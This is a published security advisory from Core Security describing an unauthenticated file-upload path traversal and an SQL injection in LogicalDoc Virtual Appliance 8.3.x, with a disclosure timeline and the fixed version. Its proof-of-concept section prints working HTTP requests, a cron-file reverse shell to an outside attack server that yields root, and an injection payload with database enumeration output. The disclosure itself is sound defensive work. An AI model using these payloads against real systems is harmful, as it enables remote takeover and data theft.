LogicalDoc Virtual Appliance Multiple Vulnerabilities

2020-03-18T00:00:00
ID CORE-2019-004
Type coresecurity
Reporter Core Security
Modified 2020-03-17T00:00:00

Description

1. Advisory Information

Title: LogicalDoc Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2019-004
Advisory URL: <http://www.coresecurity.com/advisories/logicaldoc-virtual-appliance-multiple-vulnerabilities>
Date published: 2020-03-18
Date of last update: 2020-03-17
Vendors contacted: LogicalDoc
Release mode: Coordinated release

2. Vulnerability Information

Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22], SQL Injection [CWE-89]
Impact: Code execution allows privilege escalation
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2020-9423; CVE-2020-10365

3. Vulnerability Description

LogicalDoc [1] is a global software company that sells an enterprise document management system (DMS) designed to provide administration and serve as a repository for an organization’s content.

Multiple vulnerabilities were found in the Virtual Appliance version, which would allow a remote unauthenticated attacker to upload arbitrary files that could lead to the execution of arbitrary commands with root privileges.

4. Vulnerable Packages

  • LogicalDoc 8.3.1
  • LogicalDoc 8.3

Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions, and Workarounds

LogicalDoc published a patched version of the product on 2019-08-30 with the 8.3.3 release which fixes these issues.

6. Credits

These vulnerabilities were discovered and researched by Ivan Huertas from Core Security Consulting Services.

The publication of this advisory was coordinated by Pablo A. Zurro from Core Advisories Team.

7. Technical Description / Proof of Concept Code

LogicalDoc Virtual Appliance is a free virtual appliance version of the LogicalDoc Document Management tool. It is designed to be deployed inside an organization's network infrastructure. It comes bundled with a Web Management Console for documents, messaging systems, user management, and other services.

Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the whole system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to upload arbitrary files which lead to command execution and dump data from the database.

7.1 Arbitrary file upload leading to remote command execution

[CVE-2020-9423] LogicalDoc provides a functionality to add documents. Those documents could then be used for multiple tasks, such as version control, shared among users, applying tags, etc. This functionality could be abused by an unauthenticated attacker to upload an arbitrary file in a restricted folder. This would lead to the executions of malicous commands with root privileges.

The following proof of concept demonstrates the vulnerability: Firstly, we used the mechanism called "Add Documents" to add a new document in the following path: /frontend/document. A pop-up appears where multiple files could be dragged and dropped. In the background a request to /servlet.gupld is performed. This last servlet is vulnerable to an arbitrary file upload and a path traversal, as we are able to change the path by inserting ../ characters in the name parameter of the request.

As an extra verification, we performed this exact request without providing a session cookie and trying to store the file in the /etc/cron.d/ directory. This file contained commands to execute a reverse shell to our attack server. This was confirmed so an unauthenticated attack could exploit this issue.

POST /servlet.gupld HTTP/1.1

Host: 10.106.91.25

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------675725876718999651035521338

Content-Length: 321

Connection: close

Upgrade-Insecure-Requests: 1

-----------------------------675725876718999651035521338

Content-Disposition: form-data; name="../../../../../../../../etc/cron.d/partialPath"; filename="vgauth.conf"

Content-Type: text/html

          • root /bin/bash -i >& /dev/tcp/10.106.91.24/8089 0>&1

-----------------------------675725876718999651035521338--

HTTP/1.1 200

Set-Cookie: JSESSIONID=931447C141982D63AAAD8A1E4BCB11E6; Path=/; HttpOnly

Cache-Control: no-cache

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

X-Content-Type-Options: nosniff

Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://.google.com https://.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';

Content-Type: text/plain;charset=UTF-8

Date: Tue, 16 Jul 2019 16:47:38 GMT

Connection: close

Server: Undisclosed/8.41

Content-Length: 441

%%%INI%%%@@^^^?xml version="1.0" encoding="UTF-8"?^^^@@

@@^^^response^^^@@@@^^^files^^^@@@@^^^file^^^@@@@^^^ctype^^^@@text/html@@^^^/ctype^^^@@

@@^^^size^^^@@63@@^^^/size^^^@@

@@^^^field^^^@@../../../../../../../../etc/cron.d/partialPath-0@@^^^/field^^^@@

@@^^^name^^^@@vgauth.conf@@^^^/name^^^@@

@@^^^/file^^^@@

@@^^^/files^^^@@

@@^^^finished^^^@@ok@@^^^/finished^^^@@

@@^^^parameters^^^@@@@^^^/parameters^^^@@

@@^^^/response^^^@@

%%%END%%%

One minute after sending the request, we received the reverse connection on our server. Since the web server is running with root privileges, our reverse shell had the maximum privileges on the system.

[.....CONSOLE ON OUT ATTACK SERVER.....]

root@kali-burp:~# nc -nlvp 8089

listening on [any] 8089 ...

connect to [10.106.91.24] from (UNKNOWN) [10.106.91.25] 33102

bash: no job control in this shell

root@logicaldoc ~]#whoami

whoami

root

root@logicaldoc ~]#

7.2 SQL injection

[CVE-2020-10365] LogicalDoc populates the list of available documents by querying the database. This list could be filtered by modifying some of the parameters. We confirmed that some of them are not properly sanitized, which could allow an authenticated attacker to perform arbitrary queries to the database. Below is a common request to retrieve the list of documents:

GET /data/documents.xml?locale=en&folderId=4&filename=salesfusion&max=100&indexed=&page=1 HTTP/1.1

Host: 10.106.91.25

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: /

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: <http://10.106.91.25/frontend.jsp>

If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT

Cookie: JSESSIONID=9DBE50DF71DF092F4CB2C01EBE5E314C; ldoc-sid=d0c30aa5-9819-4c44-917e-455155d5e93a; GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D

Connection: close

HTTP/1.1 200

Cache-Control: no-store

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Pragma: no-cache

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

X-Content-Type-Options: nosniff

Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://.google.com https://.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';

Content-Type: text/xml;charset=UTF-8

Content-Length: 938

Date: Tue, 16 Jul 2019 17:39:18 GMT

Connection: close

Server: Undisclosed/8.41

<list><document><id>3604484</id><folderId>4</folderId><customId><![CDATA[3604484]]></customId><icon>generic</icon><version>1.0</version><lastModified>2019-07-16T17:39:01</lastModified><published>2019-07-16T17:39:01</published><publisher><![CDATA[Admin Admin]]></publisher><created>2019-07-16T17:39:01</created><creator><![CDATA[Admin Admin]]></creator><size>734</size><status>0</status><immutable>0</immutable><indexed>0</indexed><password>false</password><signed>0</signed><stamped>0</stamped><bookmarked>false</bookmarked><filename><![CDATA[salesfusion]]></filename><type><![CDATA[unknown]]></type><rating>0</rating><fileVersion><![CDATA[1.0]]></fileVersion><comment><![CDATA[]]></comment><workflowStatus><![CDATA[]]></workflowStatus><workflowStatusDisplay><![CDATA[]]></workflowStatusDisplay><startPublishing>2019-07-16T04:00:00</startPublishing><stopPublishing></stopPublishing><publishedStatus>yes</publishedStatus></document></list>

Boolean-based SQL Injection is a SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. We tampered with the filename parameter to create a valid SQL query. Below is an example of a TRUE statement:

GET /data/documents.xml?locale=en&folderId=4&filename=salesfusion'+OR+NOT+9907%3d9907+AND+'ynwj'+LIKE+'ynwj&max=100&indexed=&page=1 HTTP/1.1

Host: 10.106.91.25

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: /

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: <http://10.106.91.25/frontend.jsp>

If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT

Cookie: JSESSIONID=9DBE50DF71DF092F4CB2C01EBE5E314C; ldoc-sid=d0c30aa5-9819-4c44-917e-455155d5e93a; GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D

Connection: close

HTTP/1.1 200

Cache-Control: no-store

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Pragma: no-cache

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

X-Content-Type-Options: nosniff

Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src 'self' https://.google.com https://.zoho.com ; frame-ancestors *; style-src * 'unsafe-inline';

Content-Type: text/xml;charset=UTF-8

Content-Length: 938

Date: Tue, 16 Jul 2019 18:07:36 GMT

Connection: close

Server: Undisclosed/8.41

<list><document><id>3604484</id><folderId>4</folderId><customId><![CDATA[3604484]]></customId><icon>generic</icon><version>1.0</version><lastModified>2019-07-16T17:52:50</lastModified><published>2019-07-16T17:39:01</published><publisher><![CDATA[Admin Admin]]></publisher><created>2019-07-16T17:39:01</created><creator><![CDATA[Admin Admin]]></creator><size>734</size><status>0</status><immutable>0</immutable><indexed>1</indexed><password>false</password><signed>0</signed><stamped>0</stamped><bookmarked>false</bookmarked><filename><![CDATA[salesfusion]]></filename><type><![CDATA[unknown]]></type><rating>0</rating><fileVersion><![CDATA[1.0]]></fileVersion><comment><![CDATA[]]></comment><workflowStatus><![CDATA[]]></workflowStatus><workflowStatusDisplay><![CDATA[]]></workflowStatusDisplay><startPublishing>2019-07-16T04:00:00</startPublishing><stopPublishing></stopPublishing><publishedStatus>yes</publishedStatus></document></list>

Below is an extract of information retrieved by sending multiple SQL queries:

[13:37:28] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5

[13:37:28] [INFO] fetching database names

[13:37:28] [INFO] fetching number of databases

[13:37:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:37:28] [INFO] retrieved:

[13:37:29] [INFO] fetching current database

[13:37:29] [INFO] retrieved: logicaldoc

[13:37:31] [INFO] fetching tables for database: 'logicaldoc'

[13:37:31] [INFO] fetching number of tables for database 'logicaldoc'

[13:37:31] [INFO] retrieved:

8. Report Timeline

2019-07-18: Core Security made initial contact with LogicalDoc, including a draft advisory with two vulnerabilities.

2019-08-30: Vulnerabilities solved by LogicalDoc in version 8.3.3.

2020-02-26: Applied for first CVE via MITRE website, received confirmation of application.

2020-02-28: MITRE assigns CVE-2020-9423 to first vulnerability.

2020-03-10: Applied for CVEs via MITRE for second vulnerability. MITRE assigns CVE-2020-10365.

2020-03-18: Advisory published.

9. References

[1] <https://www.logicaldoc.com/>

10. About CoreLabs

CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.

11. About Core Security, A HelpSystems Company

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at <http://www.coresecurity.com/files/attachments/core_security_advisories.asc>.